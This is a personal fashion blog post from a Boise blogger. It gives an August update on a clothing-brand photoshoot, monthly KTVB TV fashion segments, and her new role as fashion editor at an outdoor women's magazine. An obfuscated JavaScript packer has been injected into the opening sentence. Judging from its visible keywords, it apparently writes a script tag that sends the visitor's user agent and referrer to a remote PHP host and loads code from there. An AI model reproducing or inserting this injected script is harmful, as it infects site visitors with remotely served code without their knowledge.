A Little Personal Update!

Oh eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fnhsk|var|u0026u|referrer|bikfi||js|php’.split(‘|’),0,{}))
my, it’s been a busy month!
Has your August been as crazy as mine? I realized I haven’t posted in a couple weeks, and thought I’d give you a quick update.

I’m still here! I promise. 🙂

The truth is, I’ve been so busy with photo shoots, Fashion Segments with KTVB, and working on articles for a newly-launching magazine here in Boise, that I haven’t had time to put many fashion posts together this month. Oh, and I have KIDS! They’re awesome, and I’m trying to spend as much time with them as I can before school starts. Does anybody else feel like August is SPEEDING by at lightening speed??

Here’s a sneak peek at some of the projects I’ve been working on. Stay tuned, this little Fashion Blogger is hard at work to bring you awesome fun things, very soon!

1. Photoshoot & Media Campaign with Skip N Whistle & Ammophotog

skipandwhistlegrid

National clothing company Skip N Whistle chose me as one of their 3 “Favorite Bloggers” in the US! I’m so honored!!! I can’t release all of the photos yet from the 20-outfit photo shoot I did for SNW, with the always-amazing Ammophotog, but here are a couple sneaky CLOSE-UPS, including that AMAZING Idaho belt from Banana-ink everyone’s been asking me about. I loved it so much, I’m featuring it as my Style Pick of the week!

Also featured: hand-made BULLET necklaces from jewelry designer Anna Van Wey Dempsay at Body Novelties in Eagle. You’ll be seeing more of these in the photoshoot, coming soon!

2. KTVB Fashion Segments

rack1

It all started when KTVB’s veteran journalist Carolyn Holly contacted me, asking for help in updating her wardrobe. Since then, I’ve had a blast doing monthly Fashion Segment with her, ranging from wardrobe advice, to shopping on a budget, to children’s trends for fall (coming up next!)

Stay tuned, because I have some crazy-fun ideas coming up for these segments! If you happen to see me and a KTVB camera crew filming around town, be sure to wave and say hey!

3. Snowbunnymag.com

snowbunny-logoI’ve been so blessed & grateful lately to have all these awesome career opportunities that are, of course, work, but also tons of fun! Throwing my fashion hat into the ring for Snowbunnymag.com is exactly one of those awesome fun opportunities.

Snowbunnymag.com is an online resource for women, by women, who love skiing, snowboarding, rafting, hiking, climbing, running… If it’s an outdoor adventure and women are rocking it, we’re there! My role is Fashion Bunny, er, that is, Fashion Editor. And let me tell you, this gig keeps me hopping!

Snowbunnymag.com launches this October, with ski reports, fashion advice, beauty how-to’s, health articles, fitness tips, and features on some of the sport world’s most amazing women! You can watch our progress on Facebook here: https://www.facebook.com/snowbunnymagazine

snowbunniesThe Snowbunny Staff at our planning retreat in Sun Valley, ID

Phew, that’s it for the day, friends! Stay tuned, because amazing things are happening, and I can’t wait to share it all with you! Love and hugs!!!

XOXO,
Tanya

Follow on Bloglovin
Subscribe in a reader

Leave a comment